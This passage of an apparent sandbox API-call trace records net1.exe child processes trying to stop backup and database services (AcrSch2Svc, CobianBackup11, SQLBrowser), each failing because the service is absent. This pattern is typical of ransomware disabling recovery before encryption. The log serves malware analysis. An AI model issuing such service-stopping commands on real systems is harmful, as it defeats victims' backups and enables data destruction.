(_String1="receiver", _String2="ACRSCH2SVC") returned 17 [0071.941] _wcsicmp (_String1="rcv", _String2="ACRSCH2SVC") returned 17 [0071.941] _wcsicmp (_String1="redirector", _String2="ACRSCH2SVC") returned 17 [0071.941] _wcsicmp (_String1="redir", _String2="ACRSCH2SVC") returned 17 [0071.941] _wcsicmp (_String1="rdr", _String2="ACRSCH2SVC") returned 17 [0071.942] _wcsicmp (_String1="workstation", _String2="ACRSCH2SVC") returned 22 [0071.942] _wcsicmp (_String1="work", _String2="ACRSCH2SVC") returned 22 [0071.942] _wcsicmp (_String1="wksta", _String2="ACRSCH2SVC") returned 22 [0071.942] _wcsicmp (_String1="prdr", _String2="ACRSCH2SVC") returned 15 [0071.942] _wcsicmp (_String1="devrdr", _String2="ACRSCH2SVC") returned 3 [0071.942] _wcsicmp (_String1="lanmanworkstation", _String2="ACRSCH2SVC") returned 11 [0071.942] _wcsicmp (_String1="server", _String2="ACRSCH2SVC") returned 18 [0071.942] _wcsicmp (_String1="svr", _String2="ACRSCH2SVC") returned 18 [0071.942] _wcsicmp (_String1="srv", _String2="ACRSCH2SVC") returned 18 [0071.942] _wcsicmp (_String1="lanmanserver", _String2="ACRSCH2SVC") returned 11 [0071.942] _wcsicmp (_String1="alerter", _String2="ACRSCH2SVC") returned 9 [0071.942] _wcsicmp (_String1="netlogon", _String2="ACRSCH2SVC") returned 13 [0071.942] NetServiceControl (in: servername=0x0, service="ACRSCH2SVC", opcode=0x0, arg=0x0, bufptr=0xdfd80 | out: bufptr=0xdfd80) returned 0x889 [0071.974] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.974] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74240000 [0071.974] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74240000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.975] GetFileType (hFile=0xb) returned 0x2 [0071.980] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xdfca0 | out: lpMode=0xdfca0) returned 1 [0071.982] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xdfcc0, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0xdfcc0*=0x1e) returned 1 [0071.985] GetFileType (hFile=0xb) returned 0x2 [0071.986] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xdfca0 | out: lpMode=0xdfca0) returned 1 [0071.987] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfcc0, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0xdfcc0*=0x2) returned 1 [0071.989] _ultow (in: _Dest=0x889, _Radix=916720 | out: _Dest=0x889) returned="2185" [0071.989] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74240000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.989] GetFileType (hFile=0xb) returned 0x2 [0071.991] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xdfcac | out: lpMode=0xdfcac) returned 1 [0071.992] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xdfccc, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0xdfccc*=0x34) returned 1 [0071.993] GetFileType (hFile=0xb) returned 0x2 [0071.994] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xdfcac | out: lpMode=0xdfcac) returned 1 [0071.995] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfccc, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0xdfccc*=0x2) returned 1 [0072.009] NetApiBufferFree (Buffer=0x391c00) returned 0x0 [0072.009] NetApiBufferFree (Buffer=0x391c18) returned 0x0 [0072.009] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcrSch2Svc" [0072.009] exit (_Code=2) Process: id = "65" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1fa89000" os_pid = "0x90c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "53" os_parent_pid = "0x928" cmd_line = "C:\\Windows\\system32\\net1 stop CobianBackup11" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 188 os_tid = 0x35c [0071.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fc2c | out: lpSystemTimeAsFileTime=0x30fc2c*(dwLowDateTime=0x9988d250, dwHighDateTime=0x1d57b18)) [0071.844] GetCurrentProcessId () returned 0x90c [0071.844] GetCurrentThreadId () returned 0x35c [0071.844] GetTickCount () returned 0x114bdb4 [0071.844] QueryPerformanceCounter (in: lpPerformanceCount=0x30fc24 | out: lpPerformanceCount=0x30fc24*=19206572587) returned 1 [0071.844] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.844] __set_app_type (_Type=0x1) [0071.844] __p__fmode () returned 0x74eb31f4 [0071.845] __p__commode () returned 0x74eb31fc [0071.845] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.845] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.845] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.845] GetConsoleOutputCP () returned 0x1b5 [0071.878] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.878] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.892] sprintf_s (in: _DstBuf=0x30fbe4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.892] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.917] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.917] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.917] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop CobianBackup11" [0071.917] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f9b0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.917] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x66) returned 0x483bb0 [0071.917] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fbb4 | out: Buffer=0x30fbb4*=0x481c08) returned 0x0 [0071.917] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fbb4 | out: Buffer=0x30fbb4*=0x481c20) returned 0x0 [0071.917] _fileno (_File=0x74eb2900) returned 0 [0071.917] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.917] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.917] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.918] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.918] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.918] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.918] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.918] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.918] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.918] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.918] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.918] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.918] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.918] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.918] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.918] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.918] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.918] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.918] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.918] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.918] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.918] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.918] _wcsicmp (_String1="accounts", _String2="CobianBackup11") returned -2 [0071.918] _wcsicmp (_String1="computer", _String2="CobianBackup11") returned 11 [0071.918] _wcsicmp (_String1="config", _String2="CobianBackup11") returned 12 [0071.918] _wcsicmp (_String1="continue", _String2="CobianBackup11") returned 12 [0071.918] _wcsicmp (_String1="cont", _String2="CobianBackup11") returned 12 [0071.918] _wcsicmp (_String1="file", _String2="CobianBackup11") returned 3 [0071.918] _wcsicmp (_String1="files", _String2="CobianBackup11") returned 3 [0071.918] _wcsicmp (_String1="group", _String2="CobianBackup11") returned 4 [0071.918] _wcsicmp (_String1="groups", _String2="CobianBackup11") returned 4 [0071.918] _wcsicmp (_String1="help", _String2="CobianBackup11") returned 5 [0071.918] _wcsicmp (_String1="helpmsg", _String2="CobianBackup11") returned 5 [0071.918] _wcsicmp (_String1="localgroup", _String2="CobianBackup11") returned 9 [0071.918] _wcsicmp (_String1="pause", _String2="CobianBackup11") returned 13 [0071.918] _wcsicmp (_String1="session", _String2="CobianBackup11") returned 16 [0071.918] _wcsicmp (_String1="sessions", _String2="CobianBackup11") returned 16 [0071.918] _wcsicmp (_String1="sess", _String2="CobianBackup11") returned 16 [0071.918] _wcsicmp (_String1="share", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="start", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="stats", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="statistics", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="stop", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="time", _String2="CobianBackup11") returned 17 [0071.919] _wcsicmp (_String1="user", _String2="CobianBackup11") returned 18 [0071.919] _wcsicmp (_String1="users", _String2="CobianBackup11") returned 18 [0071.919] _wcsicmp (_String1="msg", _String2="CobianBackup11") returned 10 [0071.919] _wcsicmp (_String1="messenger", _String2="CobianBackup11") returned 10 [0071.919] _wcsicmp (_String1="receiver", _String2="CobianBackup11") returned 15 [0071.919] _wcsicmp (_String1="rcv", _String2="CobianBackup11") returned 15 [0071.919] _wcsicmp (_String1="netpopup", _String2="CobianBackup11") returned 11 [0071.919] _wcsicmp (_String1="redirector", _String2="CobianBackup11") returned 15 [0071.919] _wcsicmp (_String1="redir", _String2="CobianBackup11") returned 15 [0071.919] _wcsicmp (_String1="rdr", _String2="CobianBackup11") returned 15 [0071.919] _wcsicmp (_String1="workstation", _String2="CobianBackup11") returned 20 [0071.919] _wcsicmp (_String1="work", _String2="CobianBackup11") returned 20 [0071.919] _wcsicmp (_String1="wksta", _String2="CobianBackup11") returned 20 [0071.919] _wcsicmp (_String1="prdr", _String2="CobianBackup11") returned 13 [0071.919] _wcsicmp (_String1="devrdr", _String2="CobianBackup11") returned 1 [0071.919] _wcsicmp (_String1="lanmanworkstation", _String2="CobianBackup11") returned 9 [0071.919] _wcsicmp (_String1="server", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="svr", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="srv", _String2="CobianBackup11") returned 16 [0071.919] _wcsicmp (_String1="lanmanserver", _String2="CobianBackup11") returned 9 [0071.919] _wcsicmp (_String1="alerter", _String2="CobianBackup11") returned -2 [0071.919] _wcsicmp (_String1="netlogon", _String2="CobianBackup11") returned 11 [0071.919] _wcsupr (in: _String="CobianBackup11" | out: _String="COBIANBACKUP11") returned="COBIANBACKUP11" [0071.919] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x485490 [0071.938] GetServiceKeyNameW (in: hSCManager=0x485490, lpDisplayName="COBIANBACKUP11", lpServiceName=0xb1aaf0, lpcchBuffer=0x30fb50 | out: lpServiceName="", lpcchBuffer=0x30fb50) returned 0 [0071.942] _wcsicmp (_String1="msg", _String2="COBIANBACKUP11") returned 10 [0071.942] _wcsicmp (_String1="messenger", _String2="COBIANBACKUP11") returned 10 [0071.942] _wcsicmp (_String1="receiver", _String2="COBIANBACKUP11") returned 15 [0071.942] _wcsicmp (_String1="rcv", _String2="COBIANBACKUP11") returned 15 [0071.942] _wcsicmp (_String1="redirector", _String2="COBIANBACKUP11") returned 15 [0071.942] _wcsicmp (_String1="redir", _String2="COBIANBACKUP11") returned 15 [0071.942] _wcsicmp (_String1="rdr", _String2="COBIANBACKUP11") returned 15 [0071.942] _wcsicmp (_String1="workstation", _String2="COBIANBACKUP11") returned 20 [0071.943] _wcsicmp (_String1="work", _String2="COBIANBACKUP11") returned 20 [0071.943] _wcsicmp (_String1="wksta", _String2="COBIANBACKUP11") returned 20 [0071.965] _wcsicmp (_String1="prdr", _String2="COBIANBACKUP11") returned 13 [0071.965] _wcsicmp (_String1="devrdr", _String2="COBIANBACKUP11") returned 1 [0071.965] _wcsicmp (_String1="lanmanworkstation", _String2="COBIANBACKUP11") returned 9 [0071.965] _wcsicmp (_String1="server", _String2="COBIANBACKUP11") returned 16 [0071.965] _wcsicmp (_String1="svr", _String2="COBIANBACKUP11") returned 16 [0071.965] _wcsicmp (_String1="srv", _String2="COBIANBACKUP11") returned 16 [0071.965] _wcsicmp (_String1="lanmanserver", _String2="COBIANBACKUP11") returned 9 [0071.965] _wcsicmp (_String1="alerter", _String2="COBIANBACKUP11") returned -2 [0071.965] _wcsicmp (_String1="netlogon", _String2="COBIANBACKUP11") returned 11 [0071.965] NetServiceControl (in: servername=0x0, service="COBIANBACKUP11", opcode=0x0, arg=0x0, bufptr=0x30fb4c | out: bufptr=0x30fb4c) returned 0x889 [0071.976] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.976] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74240000 [0071.976] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74240000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.977] GetFileType (hFile=0xb) returned 0x2 [0071.981] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30fa6c | out: lpMode=0x30fa6c) returned 1 [0071.982] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x30fa8c, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x30fa8c*=0x1e) returned 1 [0071.985] GetFileType (hFile=0xb) returned 0x2 [0071.986] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30fa6c | out: lpMode=0x30fa6c) returned 1 [0071.987] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30fa8c, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x30fa8c*=0x2) returned 1 [0071.989] _ultow (in: _Dest=0x889, _Radix=3209916 | out: _Dest=0x889) returned="2185" [0071.989] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74240000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.990] GetFileType (hFile=0xb) returned 0x2 [0071.991] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30fa78 | out: lpMode=0x30fa78) returned 1 [0071.992] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x30fa98, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x30fa98*=0x34) returned 1 [0071.993] GetFileType (hFile=0xb) returned 0x2 [0071.994] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30fa78 | out: lpMode=0x30fa78) returned 1 [0071.995] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30fa98, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x30fa98*=0x2) returned 1 [0072.014] NetApiBufferFree (Buffer=0x481c08) returned 0x0 [0072.014] NetApiBufferFree (Buffer=0x481c20) returned 0x0 [0072.014] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop CobianBackup11" [0072.015] exit (_Code=2) Process: id = "66" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x220d2000" os_pid = "0x6f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "54" os_parent_pid = "0x9bc" cmd_line = "C:\\Windows\\system32\\net1 stop SQLBrowser" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 189 os_tid = 0x868 [0071.850] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32fdb4 | out: lpSystemTimeAsFileTime=0x32fdb4*(dwLowDateTime=0x998b33b0, dwHighDateTime=0x1d57b18)) [0071.850] GetCurrentProcessId () returned 0x6f8 [0071.850] GetCurrentThreadId () returned 0x868 [0071.850] GetTickCount () returned 0x114bdc4 [0071.850] QueryPerformanceCounter (in: lpPerformanceCount=0x32fdac | out: lpPerformanceCount=0x32fdac*=19207129160) returned 1 [0071.850] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.850] __set_app_type (_Type=0x1) [0071.850] __p__fmode () returned 0x74eb31f4 [0071.850] __p__commode () returned 0x74eb31fc [0071.850] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.850] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.850] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.850] GetConsoleOutputCP () returned 0x1b5 [0071.880] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.880] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.893] sprintf_s (in: _DstBuf=0x32fd6c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.893] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.924] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.924] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.924] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLBrowser" [0071.924] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32fb38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.924] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x5e) returned 0x393ba8 [0071.924] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32fd3c | out: Buffer=0x32fd3c*=0x391c00) returned 0x0 [0071.924] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32fd3c | out: Buffer=0x32fd3c*=0x391c18) returned 0x0 [0071.924] _fileno (_File=0x74eb2900) returned 0 [0071.924] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.924] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.924] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.924] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.924] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.924] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.924] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.924] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.924] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.924] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.924] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.924] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.924] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.924] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.924] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.924] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.924] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.924] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.924] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.924] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.925] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.925] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.925] _wcsicmp (_String1="accounts", _String2="SQLBrowser") returned -18 [0071.925] _wcsicmp (_String1="computer", _String2="SQLBrowser") returned -16 [0071.925] _wcsicmp (_String1="config", _String2="SQLBrowser") returned -16 [0071.925] _wcsicmp (_String1="continue", _String2="SQLBrowser") returned -16 [0071.925] _wcsicmp (_String1="cont", _String2="SQLBrowser") returned -16 [0071.925] _wcsicmp (_String1="file", _String2="SQLBrowser") returned -13 [0071.925] _wcsicmp (_String1="files", _String2="SQLBrowser") returned -13 [0071.925] _wcsicmp (_String1="group", _String2="SQLBrowser") returned -12 [0071.925] _wcsicmp (_String1="groups", _String2="SQLBrowser") returned -12 [0071.925] _wcsicmp (_String1="help", _String2="SQLBrowser") returned -11 [0071.925] _wcsicmp (_String1="helpmsg", _String2="SQLBrowser") returned -11 [0071.925] _wcsicmp (_String1="localgroup", _String2="SQLBrowser") returned -7 [0071.925] _wcsicmp (_String1="pause", _String2="SQLBrowser") returned -3 [0071.925] _wcsicmp (_String1="session", _String2="SQLBrowser") returned -12 [0071.925] _wcsicmp (_String1="sessions", _String2="SQLBrowser") returned -12 [0071.925] _wcsicmp (_String1="sess", _String2="SQLBrowser") returned -12 [0071.925] _wcsicmp (_String1="share", _String2="SQLBrowser") returned -9 [0071.925] _wcsicmp (_String1="start", _String2="SQLBrowser") returned 3 [0071.925] _wcsicmp (_String1="stats", _String2="SQLBrowser") returned 3 [0071.925] _wcsicmp (_String1="statistics", _String2="SQLBrowser") returned 3 [0071.925] _wcsicmp (_String1="stop", _String2="SQLBrowser") returned 3 [0071.925] _wcsicmp (_String1="time", _String2="SQLBrowser") returned 1 [0071.925] _wcsicmp (_String1="user", _String2="SQLBrowser") returned 2 [0071.925] _wcsicmp (_String1="users", _String2="SQLBrowser") returned 2 [0071.925] _wcsicmp (_String1="msg", _String2="SQLBrowser") returned -6 [0071.925] _wcsicmp (_String1="messenger", _String2="SQLBrowser") returned -6 [0071.925] _wcsicmp (_String1="receiver", _String2="SQLBrowser") returned -1 [0071.925] _wcsicmp (_String1="rcv", _String2="SQLBrowser") returned -1 [0071.925] _wcsicmp (_String1="netpopup", _String2="SQLBrowser") returned -5 [0071.925] _wcsicmp (_String1="redirector", _String2="SQLBrowser") returned -1 [0071.925] _wcsicmp (_String1="redir", _String2="SQLBrowser") returned -1 [0071.925] _wcsicmp (_String1="rdr", _String2="SQLBrowser") returned -1 [0071.925] _wcsicmp (_String1="workstation", _String2="SQLBrowser") returned 4 [0071.925] _wcsicmp (_String1="work", _String2="SQLBrowser") returned 4 [0071.926] _wcsicmp (_String1="wksta", _String2="SQLBrowser") returned 4 [0071.926] _wcsicmp (_String1="prdr", _String2="SQLBrowser") returned -3 [0071.926] _wcsicmp (_String1="devrdr", _String2="SQLBrowser") returned -15 [0071.926] _wcsicmp (_String1="lanmanworkstation", _String2="SQLBrowser") returned -7 [0071.926] _wcsicmp (_String1="server", _String2="SQLBrowser") returned -12 [0071.926] _wcsicmp (_String1="svr", _String2="SQLBrowser") returned 5 [0071.926] _wcsicmp (_String1="srv", _String2="SQLBrowser") returned 1 [0071.926] _wcsicmp (_String1="lanmanserver", _String2="SQLBrowser") returned -7 [0071.926] _wcsicmp (_String1="alerter", _String2="SQLBrowser") returned -18 [0071.926] _wcsicmp (_String1="netlogon", _String2="SQLBrowser") returned -5 [0071.926] _wcsupr (in: _String="SQLBrowser" | out: _String="SQLBROWSER") returned="SQLBROWSER" [0071.926] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x395480 [0071.939] GetServiceKeyNameW (in: hSCManager=0x395480, lpDisplayName="SQLBROWSER", lpServiceName=0xb1aaf0, lpcchBuffer=0x32fcd8 | out: lpServiceName="", lpcchBuffer=0x32fcd8) returned 0 [0071.966] _wcsicmp (_String1="msg", _String2="SQLBROWSER") returned -6 [0071.966] _wcsicmp (_String1="messenger", _String2="SQLBROWSER") returned -6 [0071.966] _wcsicmp (_String1="receiver", _String2="SQLBROWSER") returned -1 [0071.966] _wcsicmp (_String1="rcv", _String2="SQLBROWSER") returned -1 [0071.966] _wcsicmp (_String1="redirector", _String2="SQLBROWSER") returned -1 [0071.966] _wcsicmp (_String1="redir", _String2="SQLBROWSER") returned -1 [0071.966] _wcsicmp (_String1="rdr", _String2="SQLBROWSER") returned -1 [0071.966] _wcsicmp (_String1="workstation", _String2="SQLBROWSER") returned 4 [0071.966] _wcsicmp (_String1="work", _String2="SQLBROWSER") returned 4 [0071.966] _wcsicmp (_String1="wksta", _String2="SQLBROWSER") returned 4 [0071.966] _wcsicmp (_String1="prdr", _String2="SQLBROWSER") returned -3 [0071.966] _wcsicmp (_String1="devrdr", _String2="SQLBROWSER") returned -15 [0071.966] _wcsicmp (_String1="lanmanworkstation", _String2="SQLBROWSER") returned -7 [0071.966] _wcsicmp (_String1="server", _String2="SQLBROWSER") returned -12 [0071.966] _wcsicmp (_String1="svr", _String2="SQLBROWSER") returned 5 [0071.966] _wcsicmp (_String1="srv", _String2="SQLBROWSER") returned 1 [0071.966] _wcsicmp (_String1="lanmanserver", _String2="SQLBROWSER") returned -7 [0071.966] _wcsicmp (_String1="alerter", _String2="SQLBROWSER") returned -18 [0071.966] _wcsicmp (_String1="netlogon", _String2="SQLBROWSER") returned -5 [0071.966] NetServiceControl (in: servername=0x0, service="SQLBROWSER", opcode=0x0, arg=0x0, bufptr=0x32fcd4 | out: bufptr=0x32fcd4) returned 0x889 [0071.978] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.978] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74240000 [0071.978] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74240000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.979] GetFileType (hFile=0xb) returned 0x2 [0071.981] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32fbf4 | out: lpMode=0x32fbf4) returned 1 [0071.982] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x32fc14, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x32fc14*=0x1e) returned 1 [0071.985] GetFileType (hFile=0xb) returned 0x2 [0071.986] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32fbf4 | out: lpMode=0x32fbf4) returned 1 [0071.987] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32fc14, lpReserved=0x0 | out: lpBuffer=0xb016cc*, 